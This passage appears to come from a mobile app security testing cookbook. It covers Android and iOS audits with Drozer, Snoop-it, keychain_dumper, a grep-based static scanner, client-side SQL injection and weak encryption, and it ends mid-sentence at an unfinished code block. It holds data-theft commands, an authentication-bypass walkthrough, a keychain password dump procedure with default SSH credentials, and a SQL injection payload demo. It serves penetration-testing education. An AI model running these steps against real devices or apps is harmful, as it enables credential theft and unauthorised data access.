Open the analysis of the application of your interest. Andrubis computes an overall malice score (out of 10) for the applications and shows a color icon on its main screen to reflect how vulnerable each application is. We selected an orange colored application to make more sense with this recipe. 
This is how the application summary and score are shown in Andrubis:
Let us navigate to the Dynamic Analysis tab and check the results:
The results are interesting for this application. Notice that all the files going to be written by the application under dynamic analysis are listed. In our case, one preferences.xml is located. Though the fact that the application is going to create a preferences file could have been found in static analysis as well, dynamic analysis additionally confirmed that such a file is indeed created. It also confirms that the code snippet found in static analysis about the creation of a preferences file is not dormant code, but a file that is going to be created. Further, go ahead and read the created file and find any sensitive data present there. Who knows, luck may strike and give you a key to hidden treasure.
Notice that the first screen has a hyperlink, View full report in browser. Tap on it and notice that the detailed dynamic analysis is presented for your further analysis. This also lets you understand what the tool tried and what response it got. This is shown in the following screenshot:
There's more...
The current recipe used a dynamic analyzer belonging to the latter category. There are many other tools available in the former category. Since this is the Android platform, many of them are open source tools. DroidBox can be tried for dynamic analysis. It looks for file operations (read/write), network data traffic, SMS, permissions, broadcast receivers, and so on, among other checks. Hooker is another tool that can intercept and modify API calls initiated from the application. This is very useful in dynamic analysis. Try hooking and tampering with data in API calls.
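Reading the created preferences file for sensitive data, as suggested above, can be scripted. The XML below is a hypothetical example of an app-created preferences.xml; real files will differ per application:

```python
import xml.etree.ElementTree as ET

# Hypothetical preferences.xml of the kind dynamic analysis showed the app
# writing; content is invented for illustration.
PREFS_XML = """<?xml version="1.0" encoding="utf-8"?>
<map>
    <string name="username">jack</string>
    <string name="password">S3cret!</string>
    <boolean name="remember_me" value="true" />
</map>"""

SENSITIVE_NAMES = ("password", "pin", "token", "secret", "key")

def find_sensitive_prefs(xml_text):
    """Return (name, value) pairs whose key name looks sensitive."""
    root = ET.fromstring(xml_text)
    hits = []
    for child in root:
        name = child.get("name", "")
        if any(word in name.lower() for word in SENSITIVE_NAMES):
            hits.append((name, child.text or child.get("value")))
    return hits

print(find_sensitive_prefs(PREFS_XML))
```

A hit like a cleartext password stored in shared preferences is exactly the "key to hidden treasure" the recipe talks about.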
See also
https://play.google.com/store/apps/details?id=org.iseclab.andrubis
https://code.google.com/p/droidbox/
https://github.com/AndroidHooker/hooker
Using Drozer to find vulnerabilities in Android applications
Drozer is a mobile security audit and attack framework, maintained by MWR InfoSecurity. It is a must-have tool in the tester's armory. Drozer (an Android installed application) interacts with other Android applications via IPC (Inter-Process Communication). It allows fingerprinting of application package-related information and its attack surface, and attempts to exploit those. Drozer is an attack framework and advanced-level exploits can be conducted from it. We use Drozer to find vulnerabilities in our applications.
Getting ready
Install Drozer by downloading it from https://www.mwrinfosecurity.com/products/drozer/ and follow the installation instructions mentioned in the user guide. Install the Drozer console agent and start a session as mentioned in the user guide. If your installation is correct, you should get the Drozer command prompt (dz>). You should also have a few vulnerable applications to analyze. Here we chose the OWASP GoatDroid application.
How to do it...
Every pentest starts with fingerprinting. Let us use Drozer for the same. The Drozer User Guide is very helpful for referring to the commands. The following command can be used to obtain information about an Android application package:
run app.package.info -a <package name>
We used the same to extract the information from the GoatDroid application and found the following results:
Notice that apart from the general information about the application, User Permissions are also listed by Drozer.
Further, let us analyze the attack surface. Drozer's attack surface lists the exposed activities, broadcast receivers, content providers, and services. Unintentionally exposed components may be a critical security risk and may provide you access to privileged content.
Drozer has the following command to analyze the attack surface:
run app.package.attacksurface <package name>
We used the same to obtain the attack surface of the Herd Financial application of GoatDroid and the results can be seen in the following screenshot. Notice that one Activity and one Content Provider are exposed. We chose to attack the content provider to obtain the data stored locally. We used the following Drozer command to analyze the content provider of the same application:
run app.provider.info -a <package name>
This gave us the details of the exposed content provider, which we used in another Drozer command:
run scanner.provider.finduris -a <package name>
We could successfully query the content providers. Lastly, we would be interested in stealing the data stored by this content provider. This is possible via another Drozer command:
run app.provider.query content://<content provider details>/
The entire sequence of events is shown in the following screenshot:
How it works...
ADB is used to establish a connection between the Drozer Python server (present on the computer) and the Drozer agent (the .apk file installed in the emulator or Android device). The Drozer console is initialized to run the various commands we saw. The Drozer agent utilizes the Android OS feature of IPC to take over the role of the target application and run the various commands as the original application.
There's more...
Drozer not only allows users to obtain the attack surface and steal data via content providers or launch intent injection attacks; it goes way beyond that. It can be used to fuzz the application and cause local injection attacks by providing a way to inject payloads. Drozer can also be used to run various in-built exploits and can be utilized to attack Android applications via custom-developed exploits. Further, it can also run in Infrastructure mode, allowing remote connections and remote attacks.
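When triaging many packages, the attacksurface output can be parsed programmatically. The sketch below assumes drozer's usual "N <component type> exported" lines; the exact wording may differ across drozer versions, and the sample text is illustrative:

```python
import re

# Assumed shape of a typical "run app.package.attacksurface" result.
SAMPLE_OUTPUT = """Attack Surface:
  1 activities exported
  0 broadcast receivers exported
  1 content providers exported
  0 services exported
"""

def parse_attack_surface(text):
    """Map component type -> exported count from drozer-style output."""
    pattern = re.compile(
        r"(\d+)\s+(activities|broadcast receivers|content providers|services)\s+exported")
    return {kind: int(count) for count, kind in pattern.findall(text)}

surface = parse_attack_surface(SAMPLE_OUTPUT)
# Components with a non-zero count are the candidates for further probing
# with app.provider.info, scanner.provider.finduris, and app.provider.query.
targets = [kind for kind, count in surface.items() if count]
print(targets)
```

This makes it easy to shortlist, across a device full of apps, which ones expose activities or content providers worth attacking.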
See also
Launching intent injection in Android
https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
Auditing iOS application using static analysis
Static analysis in source code reviews is an easier technique, and employing static string searches makes it convenient to use. Static analysis is conducted on the raw or decompiled source code or on the compiled (object) code, but the analysis is conducted outside of runtime. Usually, static analysis figures out vulnerable or insecure code patterns.
Getting ready
For conducting static analysis of iOS applications, we need at least one iOS application and a static code scanner. Pick up any iOS application of your choice and use any static analyzer tool of your choice. We will use iOS-ScriptDroid, a static analysis script developed by Android security researcher Dinesh Shetty.
How to do it...
Keep the decompressed iOS application files and note the path of the folder containing the .m files. Create an iOS-ScriptDroid.bat file by using the following code:
ECHO Running ScriptDroid ...
@ECHO OFF
SET /P Filelocation=Please Enter Location:
:: SET Filelocation=Location of the folder containing all the .m files eg: C:\sourcecode\project iOS\xyz
mkdir %Filelocation%\OUTPUT

:: Code to check for Sensitive Information storage in Phone memory
grep -H -i -n -C2 -e "NSFile" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\phonememory.txt"
grep -H -i -n -e "writeToFile " "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\phonememory.txt"

:: Code to check for possible Buffer overflow
grep -H -i -n -e "strcat(\|strcpy(\|strncat(\|strncpy(\|sprintf(\|vsprintf(\|gets(" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\BufferOverflow.txt"

:: Code to check for usage of URL Schemes
grep -H -i -n -C2 "openUrl\|handleOpenURL" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\URLSchemes.txt"

:: Code to check for possible JavaScript injection
grep -H -i -n -e "webview" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\probableXss.txt"

:: Code to check for presence of possible weak algorithms
grep -H -i -n -e "MD5" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\tweakencryption.txt"
grep -H -i -n -e "base64" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\tweakencryption.txt"
grep -H -i -n -e "des" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\tweakencryption.txt"
grep -H -i -n -v "//" "%Filelocation%\OUTPUT\tweakencryption.txt" >> "%Filelocation%\OUTPUT\weakencryption.txt"
del %Filelocation%\OUTPUT\tweakencryption.txt

:: Code to check for weak transportation medium
grep -H -i -n -e "http://" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\overhttp.txt"
grep -H -i -n -e "NSURL" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\OtherUrlConnection.txt"
grep -H -i -n -e "URL" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\OtherUrlConnection.txt"
grep -H -i -n -e "writeToUrl" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\OtherUrlConnection.txt"
grep -H -i -n -e "NSURLConnection" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\OtherUrlConnection.txt"
grep -H -i -n -C2 "CFStream" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\OtherUrlConnection.txt"
grep -H -i -n -C2 "NSStreamin" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\OtherUrlConnection.txt"
grep -H -i -n -e "setAllowsAnyHTTPSCertificate\|kCFStreamSSLAllowsExpiredRoots\|kCFStreamSSLAllowsExpiredCertificates" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\BypassSSLvalidations.txt"
grep -H -i -n -e "kCFStreamSSLAllowsAnyRoot\|continueWithoutCredentialForAuthenticationChallenge" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\BypassSSLvalidations.txt"
:: to add check for "didFailWithError"

:: Code to check for presence of possible SQL Content
grep -H -i -F -e "db" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\sqlcontent.txt"
grep -H -i -F -e "sqlite" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\sqlcontent.txt"
grep -H -i -F -e "database" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\sqlcontent.txt"
grep -H -i -F -e "insert" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\sqlcontent.txt"
grep -H -i -F -e "delete" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\sqlcontent.txt"
grep -H -i -F -e "select" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\sqlcontent.txt"
grep -H -i -F -e "table" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\sqlcontent.txt"
grep -H -i -F -e "cursor" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\sqlcontent.txt"
grep -H -i -F -e "sqlite3_prepare" "%Filelocation%\OUTPUT\sqlcontent.txt" >> "%Filelocation%\OUTPUT\sqlcontent.txt"
grep -H -i -F -e "sqlite3_compile" "%Filelocation%\OUTPUT\sqlcontent.txt" >> "%Filelocation%\OUTPUT\sqlcontent.txt"

:: Code to check for presence of keychain usage source code
grep -H -i -n -e "kSecASttr\|SFHFKkey" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\KeychainUsage.txt"

:: Code to check for Logging mechanism
grep -H -i -n -F "NSLog" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\Logging.txt"
grep -H -i -n -F "XLog" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\Logging.txt"
grep -H -i -n -F "ZNLog" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\Logging.txt"

:: Code to check for presence of password in source code
grep -H -i -n -e "password\|pwd" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\password.txt"

:: Code to check for Debugging status
grep -H -i -n -e "#ifdef DEBUG" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\DebuggingAllowed.txt"

:: Code to check for presence of Device Identifiers === need to work more on this
grep -H -i -n -e "uid\|user-id\|imei\|deviceId\|deviceSerialNumber\|devicePrint\|X-DSN\|phone\|mdn\|did\|IMSI\|uuid" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\Temp_Identifiers.txt"
grep -H -i -n -v "//" "%Filelocation%\OUTPUT\Temp_Identifiers.txt" >> "%Filelocation%\OUTPUT\Device_Identifier.txt"
del %Filelocation%\OUTPUT\Temp_Identifiers.txt

:: Code to check for presence of Location Info
grep -H -i -n -e "CLLocationManager\|startUpdatingLocation\|locationManager\|didUpdateToLocation\|CLLocationDegrees\|CLLocation\|CLLocationDistance\|startMonitoringSignificantLocationChanges" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\LocationInfo.txt"

:: Code to check for presence of Comments
grep -H -i -n -e "//" "%Filelocation%\*.m" >> "%Filelocation%\OUTPUT\Temp_comment.txt"
type "%Filelocation%\*.m" | gawk "/\/\*/,/\*\//" >> "%Filelocation%\OUTPUT\MultilineComments.txt"
grep -H -i -n -v "TODO" "%Filelocation%\OUTPUT\Temp_comment.txt" >> "%Filelocation%\OUTPUT\SinglelineComments.txt"
del %Filelocation%\OUTPUT\Temp_comment.txt
How it works...
Go to the command prompt and navigate to the path where iOS-ScriptDroid is placed. Run the batch file and it prompts you to input the path of the application for which you wish to perform static analysis. In our case, we arbitrarily chose an application and input the path of its implementation (.m) files. The script generates a folder by the name OUTPUT in the path where the .m files of the application are present. The OUTPUT folder contains multiple text files, each one corresponding to a particular vulnerability. The individual text files pinpoint the location of the vulnerable code pertaining to the vulnerability under discussion.
iOS-ScriptDroid gives first-hand information about various vulnerabilities present in iOS applications. For instance, here are a few of them which are specific to the iOS platform:
BufferOverflow.txt records usage of harmful functions that lack buffer limit checks, such as strcat, strcpy, and so on, found in the application.
URL schemes, if implemented in an insecure manner, may result in access-related vulnerabilities. Usage of URL schemes is listed in URLSchemes.txt.
These are useful vulnerability details to learn about iOS applications via static analysis.
There's more...
The current recipe used just iOS-ScriptDroid, but there are many other options available. You can either choose to write your own script or you may use one of the free or commercial tools available. A few commercial tools have pioneered the static analysis approach over the years via their dedicated focus.
See also
Auditing Android apps using static analysis
Auditing iOS application using a dynamic analyzer
Dynamic analysis is the runtime analysis of an application. The application is run or simulated to discover the flaws during runtime. Dynamic analysis can be tricky, especially in the case of mobile platforms. Dynamic analysis is helpful in tampering with data in transmission during runtime, for example, tampering with the amount in a transaction request being sent to a payment gateway. In applications that use custom encryption to prevent attackers from reading the data, dynamic analysis is useful in revealing the encrypted data, which can be reverse-engineered. Note that since iOS applications cannot be decompiled to the full extent, dynamic analysis becomes even more important in finding the sensitive data which could have been hardcoded.
Getting ready
For conducting dynamic analysis of iOS applications, we need at least one iOS application and a dynamic code analyzer tool. Pick up any iOS application of your choice and use any dynamic analyzer tool of your choice.
In this recipe, let us use the open source tool Snoop-it. We will use an iOS app that locks files, and which requires a PIN, pattern, or a secret question and answer to unlock and view a file. Let us see if we can analyze this app and find a security flaw in it using Snoop-it. Please note that Snoop-it only works on jailbroken devices. To install Snoop-it on your iDevice, visit https://code.google.com/p/snoop-it/wiki/GettingStarted?tm=6. We have downloaded Locker Lite from the App Store onto our device, for analysis.
How to do it...
Perform the following steps to conduct dynamic analysis of iOS applications:
Open the Snoop-it app by tapping on its icon.
Navigate to Settings. Here you will see the URL through which the interface can be accessed from your machine:
Please note the URL, for we will be using it soon. We have disabled authentication for our ease.
Now, on the iDevice, tap on Applications | Select App Store Apps and select the Locker app:
Press the home button, and open the Locker app. Note that on entering the wrong PIN, we do not get further access:
Making sure the workstation and iDevice are on the same network, open the previously noted URL in any browser. This is how the interface will look:
Click on the Objective-C Classes link under Analysis in the left-hand panel:
Now, click on SM_LoginManagerController. Class information gets loaded in the panel to the right of it.
Navigate down until you see -(void) unlockWasSuccessful and click on the radio button preceding it:
This method has now been selected. Next, click on the Setup and invoke button on the top-right of the panel. In the window that appears, click on the Invoke Method button at the bottom:
As soon as we click on the button, we notice that the authentication has been bypassed, and we can view our locked file successfully.
How it works...
Snoop-it loads all classes that are in the app, and indicates the ones that are currently operational with a green color.
Since we want to bypass the current login screen and load directly into the main page, we look for UIViewController. Inside UIViewController, we see SM_LoginManagerController, which could contain methods relevant to authentication. On observing the class, we see various methods such as numberLoginSucceed, patternLoginSucceed, and many others. The app calls the unlockWasSuccessful method when a PIN code is entered successfully. So, when we invoke this method from our machine and the function is called directly, the app loads the main page successfully.
There's more...
The current recipe used just one dynamic analyzer, but other options and tools can also be employed. There are many challenges in doing dynamic analysis of iOS applications. You may like to use multiple tools, and not just rely on one, to overcome the challenges.
See also
https://code.google.com/p/snoop-it/
Auditing Android apps using a dynamic analyzer
Examining iOS App Data storage and Keychain security vulnerabilities
Keychain in iOS is an encrypted SQLite database that uses a 128-bit AES algorithm to hold identities and passwords. On any iOS device, the Keychain SQLite database is used to store user credentials such as usernames, passwords, encryption keys, certificates, and so on. Developers use this service API to instruct the operating system to store sensitive data securely, rather than using a less secure alternative storage mechanism such as a property list file or a configuration file. In this recipe we will be analyzing a Keychain dump to discover stored credentials.
Getting ready
Please follow the given steps to prepare for Keychain dump analysis:
Jailbreak the iPhone or iPad.
Ensure the SSH server is running on the device (default after jailbreak).
Download the Keychain_dumper binary from https://github.com/ptoomey3/Keychain-Dumper
Connect the iPhone and the computer to the same Wi-Fi network.
On the computer, SSH into the iPhone by typing the iPhone IP address, the username root, and the password alpine.
How to do it...
Follow these steps to examine security vulnerabilities in iOS:
Copy keychain_dumper into the iPhone or iPad by issuing the following command:
scp keychain_dumper root@<device ip>:/private/var/tmp
Alternatively, WinSCP on Windows can be used to do the same:
Once the binary has been copied, ensure keychain-2.db has read access:
chmod +r /private/var/Keychains/keychain-2.db
This is shown in the following screenshot:
Give executable rights to the binary:
chmod 777 /private/var/tmp/keychain_dumper
Now, we simply run keychain_dumper:
/private/var/tmp/keychain_dumper
This command will dump all keychain information, which will contain all the generic and Internet passwords stored in the keychain:
How it works...
Keychain in an iOS device is used to securely store sensitive information such as credentials, for example usernames, passwords, and authentication tokens for different applications, along with connectivity (Wi-Fi/VPN) credentials and so on. It is located on iOS devices as an encrypted SQLite database file at /private/var/Keychains/keychain-2.db. Insecurity arises when application developers use this feature of the operating system to store credentials, rather than storing them themselves in NSUserDefaults, .plist files, and so on. To provide users the ease of not having to log in every time, and hence saving the credentials on the device itself, the keychain information for every app is stored outside of its sandbox.
There's more...
This analysis can also be performed for specific apps dynamically, using tools such as Snoop-it. Follow the steps to hook Snoop-it to the target app, click on Keychain Values, and analyze the attributes to see their values revealed in the Keychain. More will be discussed in further recipes.
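A dump of this kind is plain text, so triaging it for credentials is easy to script. The field labels below are assumed from typical keychain_dumper output and may differ between versions of the tool; the sample dump is invented:

```python
import re

# Assumed shape of a keychain_dumper text dump (illustrative values).
SAMPLE_DUMP = """Generic Password
----------------
Service: com.example.bank
Account: jack
Keychain Data: S3cret!

Generic Password
----------------
Service: com.example.mail
Account: jill
Keychain Data: hunter2
"""

def extract_credentials(dump_text):
    """Collect (service, account, secret) triples from the dump."""
    return re.findall(
        r"Service: (.+)\nAccount: (.+)\nKeychain Data: (.+)", dump_text)

for service, account, secret in extract_credentials(SAMPLE_DUMP):
    print(service, account, secret)
```

On a real device the dump can run to hundreds of entries, so filtering like this quickly surfaces which apps left recoverable secrets behind.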
Finding vulnerabilities in WAP-based mobile apps
WAP-based mobile applications are mobile applications or websites that run on mobile browsers. Most organizations create a lightweight version of their complex websites to run easily and appropriately in mobile browsers. For example, a hypothetical company called ABCXYZ may have their main website at www.abcxyz.com, while their mobile website takes the form m.abcxyz.com. Note that the mobile website (or WAP app) is separate from its installable application form, such as an .apk on Android. Since mobile websites run in browsers, it is very logical to say that most of the vulnerabilities applicable to web applications are applicable to WAP apps as well. However, there are caveats to this. Exploitability and risk ratings may not be the same. Moreover, not all attacks may be directly applied or conducted.
Getting ready
For this recipe, make sure to be ready with the following set of tools (in the case of Android):
ADB
WinSCP
Putty
Rooted Android mobile
SSH proxy application installed on the Android phone
Let us see the common WAP application vulnerabilities. While discussing these, we will limit ourselves to mobile browsers only:
Browser cache: Android browsers store cache in two different parts: content cache and component cache. Content cache may contain basic frontend components such as HTML, CSS, or JavaScript. Component cache contains sensitive data such as the details to be populated once the content cache is loaded. You have to locate the browser cache folder and find sensitive data in it.
Browser memory: Browser memory refers to the location used by browsers to store data. Memory is usually long-term storage, while cache is short-term. Browse through the browser memory space for various files such as .db, .xml, .txt, and so on. Check all these files for the presence of sensitive data.
Browser history: Browser history contains the list of the URLs browsed by the user.
These URLs in GET request format contain parameters. Again, our goal is to locate a URL with sensitive data for our WAP application.
Cookies: Cookies are a mechanism for websites to keep track of user sessions. Cookies are stored locally on devices. The following are the security concerns with respect to cookie usage:
Sometimes a cookie contains sensitive information
Cookie attributes, if weak, may make the application security weak
Cookie stealing may lead to a session hijack
How to do it...
Browser cache: Let's look at the steps that need to be followed with browser cache:
Android browser cache can be found at this location: /data/data/com.android.browser/cache/webviewcache/. You can either use ADB to pull the data from webviewcache, or use WinSCP/Putty and connect to the SSH application on a rooted Android phone. Either way, you will land in the webviewcache folder and find arbitrarily named files. Refer to the highlighted section in the following screenshot:
Rename the extension of the arbitrarily named files to .jpg and you will be able to view the cache in screenshot format. Search through all files for sensitive data pertaining to the WAP app you are testing.
Browser memory: Like an Android application, the browser also has a memory space under the /data/data folder by the name com.android.browser (the default browser). Here is how a typical browser memory space looks:
Make sure you traverse through all the folders to get any useful sensitive data in the context of the WAP application you are looking at.
Browser history: Go to the browser, locate options, navigate to History, and find the URLs present there.
Cookies: The files containing cookie values can be found at /data/data/com.android.browser/databases/webview.db. These DB files can be opened with the SQLite Browser tool and the cookies can be obtained.
There's more...
Apart from the primary vulnerabilities described here, which are mainly concerned with browser usage, all other web application vulnerabilities which are related to, or exploited from or within, a browser are applicable and need to be tested:
Cross-site scripting, a result of a browser executing unsanitized harmful scripts reflected by the servers, is very valid for WAP applications.
The autocomplete attribute not turned to off may result in sensitive data being remembered by the browser for returning users. This again is a source of data leakage.
Browser thumbnails and the image buffer are other sources to look for data.
Above all, the vulnerabilities in web applications which may not relate to browser usage also apply. These include OWASP Top 10 vulnerabilities such as SQL injection attacks, broken authentication and session management, and so on. Business logic validation is another important check to bypass. All these are possible by setting a proxy for the browser and playing around with the mobile traffic.
The discussion in this recipe has been around Android, but all of it is fully applicable to the iOS platform when testing WAP applications. The approach, steps to test, and locations would vary, but all the vulnerabilities still apply. You may want to try out the iExplorer and plist editor tools when working with an iPhone or iPad.
See also
http://resources.infosecinstitute.com/browser-based-vulnerabilities-in-web-applications/
Finding client-side injection
Client-side injection is a new dimension to the mobile threat landscape. Client-side injection (also known as local injection) results from the injection of malicious payloads into local storage, revealing data outside the usual workflow of the mobile application.
If ' or '1'='1 is injected into a search parameter of a mobile application, where the search functionality is built to search in a local SQLite DB file, and this reveals all the data stored in the corresponding table of the SQLite DB, client-side SQL injection is successful. Notice that the payload did not go to the database on the server side (which could be Oracle or MSSQL), but to the local database (SQLite) on the mobile. Since the injection point and the injectable target are both local (that is, on the mobile), the attack is called a client-side injection.
Getting ready
To get ready to find client-side injection, have a few mobile applications ready to be audited and have the bunch of tools used in many other recipes throughout this book. Note that client-side injection is not easy to find on account of the complexities involved; many a time you will have to fine-tune your approach based on the first signs of success.
How to do it...
The prerequisites for the existence of a client-side injection vulnerability in a mobile app are the presence of local storage and an application feature which queries the local storage. For the convenience of the first discussion, let us learn client-side SQL injection, which is fairly easy to pick up since SQL injection in web apps is so well known.
Let us take the case of a mobile banking application which stores the branch details in a local SQLite database. The application provides a search feature to users wishing to search for a branch. Now, if a person types in the city as Mumbai, the city parameter is populated with the value Mumbai and the same is dynamically added to the SQLite query. The query builds and retrieves the branch list for Mumbai city. (Usually, purely local features are provided for a faster user experience and network bandwidth conservation.)
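This branch-search scenario can be reproduced end-to-end in a few lines. The schema and rows below are invented, but the vulnerable string-concatenation pattern is exactly what makes a crafted city value subvert the query:

```python
import sqlite3

# Toy local branch table of the sort a banking app might ship for offline
# search; schema and data are illustrative.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE branches (city TEXT, branch TEXT, ifsc TEXT)")
db.executemany("INSERT INTO branches VALUES (?, ?, ?)", [
    ("Mumbai", "Fort", "ABCX0001"),
    ("Mumbai", "Andheri", "ABCX0002"),
    ("Delhi", "Karol Bagh", "ABCX0003"),
])

def search_vulnerable(city):
    # Vulnerable pattern: user input concatenated straight into the query.
    query = "SELECT branch, ifsc FROM branches WHERE city = '%s'" % city
    return db.execute(query).fetchall()

print(search_vulnerable("Mumbai"))        # only the Mumbai branches
print(search_vulnerable("x' OR '1'='1"))  # the payload returns every row
```

A parameterized query, `db.execute("SELECT branch, ifsc FROM branches WHERE city = ?", (city,))`, treats the payload as a literal string and defeats the attack.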
Now, if a user is able to inject harmful payloads into the city parameter, such as a wildcard character or a SQLite payload to drop a table, and the payload executes, revealing all the details (in the case of a wildcard) or dropping the table from the DB (in the case of a drop table payload), then you have successfully exploited client-side SQL injection.
Another type of client-side injection, presented in the OWASP Mobile Top 10 release, is local cross-site scripting (XSS). Refer to slide number 22 of the original OWASP PowerPoint presentation here: http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks. They referred to it as Garden Variety XSS and presented a code snippet wherein SMS text was accepted locally and printed at the UI. If a script was input in the SMS text, it would result in local XSS (JavaScript injection).
There's more...
In a similar fashion, HTML injection is also possible. If an HTML file contained in the application's local storage can be compromised to contain malicious code, and the application has a feature which loads or executes this HTML file, HTML injection is possible locally. A variant of the same may result in Local File Inclusion (LFI) attacks. If data is stored in the form of XML files on the mobile, local XML injection can also be attempted. There could be more variants of these attacks possible.
Finding client-side injection is quite difficult and time consuming. It may need both static and dynamic analysis approaches. Most scanners also do not support discovery of client-side injection. Another dimension to client-side injection is the impact, which is judged to be low in most cases. There is a strong counter-argument to this vulnerability: if the entire local storage can be obtained easily in Android, then why do we need to conduct client-side injection?
I agree with this argument in most cases; if the entire SQLite or XML file can be stolen from the phone, why spend time searching for a variable that accepts a wildcard to reveal the data from the SQLite or XML file? However, you should still look out for this vulnerability, as HTML injection or LFI-style attacks carry the possibility of malware-corrupted file insertion, and hence an impactful attack. Also, there are platforms such as iOS where stealing the local storage is sometimes very difficult. In such cases, client-side injection may come in handy.
See also
https://www.owasp.org/index.php/Mobile_Top_10_2014-M7
http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
Insecure encryption in mobile apps
Encryption is one of the most misused terms in information security. Some people confuse it with hashing, while others may implement encoding and call it encryption. Symmetric key and asymmetric key are the two types of encryption schemes. Mobile applications implement encryption to protect sensitive data in storage and in transit. While doing audits, your goal should be to uncover weak encryption implementations or the so-called encoding or other weaker forms, implemented in places where proper encryption should have been used. Try to circumvent the encryption implemented in the mobile application under audit.
Getting ready
Be ready with a few mobile applications and tools such as ADB and other file and memory readers, decompilers, decoding tools, and so on.
How to do it...
There are multiple types of faulty implementations of encryption in mobile applications, and different ways to discover each of them:
Encoding (instead of encryption): Many a time, mobile app developers simply implement Base64 or URL encoding in applications (an example of security by obscurity). Such encoding can be discovered simply by doing static analysis. You can use the script discussed in the first recipe of this article for finding such encoding algorithms.
Dynamic analysis will help you obtain the locally stored data in encoded format. Decoders for these known encoding algorithms are freely available, and using any of them you will be able to uncover the original value. Thus, such an implementation is not a substitute for encryption.
Serialization (instead of encryption): Another variation of faulty implementation is serialization. Serialization is the process of conversion of data objects to a byte stream. The reverse process, deserialization, is also very simple, and the original data can be obtained easily. Static analysis may help reveal implementations using serialization.
Obfuscation (instead of encryption): Obfuscation suffers from similar problems, and obfuscated values can be deobfuscated.
Hashing (instead of encryption): Hashing is a one-way process using a standard complex algorithm. These one-way hashes suffer from a major problem in that they can be replayed (without needing to recover the original data). Also, rainbow tables can be used to crack the hashes. Like the other techniques described previously, hashing usage in mobile applications can also be discovered via static analysis. Dynamic analysis may additionally be employed to reveal the one-way hashes stored locally.
How it works...
To understand insecure encryption in mobile applications, let us take a live case which we observed.
An example of weak custom implementation
While testing a live mobile banking application, my colleagues and I came across a scenario where the userid and MPIN combination was sent using custom encoding logic. The encoding logic here was a predefined character-by-character replacement, as per an in-built mapping. For example:
2 is replaced by 4
0 is replaced by 3
3 is replaced by 2
7 is replaced by =
a is replaced by R
A is replaced by N
As you can notice, there is no logic to the replacement. Until you uncover or decipher the whole in-built mapping, you won't succeed.
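Recovering such a mapping can be simulated in Python. The substitution table below uses the example replacements from the text, plus an assumed "4 is replaced by 0" entry added here so the toy table is invertible:

```python
# Example substitution table from the text; the "4": "0" entry is an
# assumption added so the toy table round-trips cleanly.
APP_MAPPING = {"2": "4", "0": "3", "3": "2", "7": "=", "4": "0", "a": "R", "A": "N"}

def app_encode(text):
    # Simulates the app's custom "encryption" (unmapped characters pass through).
    return "".join(APP_MAPPING.get(ch, ch) for ch in text)

def recover_mapping(alphabet):
    # Chosen-plaintext probe: feed each character through the app once and
    # record what comes out, rebuilding the full substitution table.
    return {ch: app_encode(ch) for ch in alphabet}

def decode(stolen, mapping):
    reverse = {v: k for k, v in mapping.items()}
    return "".join(reverse.get(ch, ch) for ch in stolen)

mapping = recover_mapping("0123456789aA")
stolen_pin = app_encode("2037")  # what an attacker intercepts on the wire
print(decode(stolen_pin, mapping))
```

One probe per character of the input alphabet is enough to rebuild the whole table, after which any intercepted value decodes instantly.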
A simple technique is to supply all possible characters one by one and watch the response. Let's input the userid and PIN as 222222 and 2222 and notice that the converted userid and PIN are 444444 and 4444 respectively, as per the mapping above. Go ahead and keep changing the inputs, and you will re-create the full mapping used by the application. Now steal the user's encoded data and apply the created mapping, thereby uncovering the original data. This whole approach is nicely described in the article mentioned under the See also section of this recipe.

This is a custom example of a faulty implementation pertaining to encryption. Such faults are often difficult to find in static analysis, especially in the case of difficult-to-reverse apps such as iOS applications. The chance of automated dynamic analysis discovering this is also low. Manual testing and analysis, along with dynamic or automated analysis, stands a better chance of uncovering such custom implementations.

There's more...

Finally, I would like to share another application we came across. This one used proper encryption. The encryption algorithm was a well-known secure algorithm and the key was strong. Still, the whole encryption process could be reversed. The application had made two mistakes; we combined both of them to break the encryption:

The application code had the standard encryption algorithm in the APK bundle. Not even obfuscation was used to protect at least the names. We used the simple process of APK to DEX to JAR conversion to uncover the algorithm details.

The application had stored the strong encryption key in a local XML file under the /data/data folder of the Android device. We used adb to read this XML file and hence obtained the encryption key.

According to Kerckhoffs' principle, the security of a cryptosystem should depend solely on the secrecy of the key and the private randomizer. This is how all encryption algorithms are implemented. The key is the secret, not the algorithm.
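The second mistake, storing the key in a local preferences file, is trivially exploitable once the file is pulled with adb. The sketch below parses a hypothetical shared_prefs file; the file layout and the aes_key entry name are illustrative, not taken from the actual application:

```python
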